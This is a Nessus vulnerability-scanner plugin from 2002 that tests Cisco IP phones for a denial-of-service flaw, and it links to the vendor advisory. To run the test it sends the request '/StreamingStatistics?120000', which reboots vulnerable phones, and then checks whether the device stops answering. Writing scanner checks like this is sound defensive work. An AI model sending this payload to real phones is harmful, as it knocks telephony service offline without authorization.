#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(11013);
 script_version ("$Revision: 1.3.2.2 $");
 
 name["english"] = "Cisco VoIP phones DoS";
 script_name(english:name["english"]);
 
 desc["english"] = "
It is possible to reboot the remote host by requesting :

	http://<phone-ip>/StreamingStatistics?120000
	

Solution : http://www.cisco.com/warp/public/707/multiple-ip-phone-vulnerabilities-pub.shtml
Risk factor : High";


 script_description(english:desc["english"]);
 
 summary["english"] = "CISCO check";
 script_summary(english:summary["english"]);
 script_category(ACT_DENIAL);
 
 
 script_copyright(english:"This script is Copyright (C) 2002 Renaud Deraison");
 family["english"] = "CISCO";
 family["francais"] = "CISCO";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes", "no404.nasl", "http_version.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

port=get_kb_item("Services/www");
if(!port)port=80;
if(!get_port_state(port))exit(0);


# we don't use start_denial/end_denial because they
# might be too slow (the phone takes 15 seconds to reboot)

alive = tcp_ping(dport:port);
if(alive)
{
 soc = http_open_socket(port);
 req = http_get(item:"/StreamingStatistics?120000", port:port);
 send(socket:soc, data:req);
 sleep(5);
 alive = tcp_ping(dport:port);
 if(!alive)security_hole(port);
 else http_close_socket(soc);
}


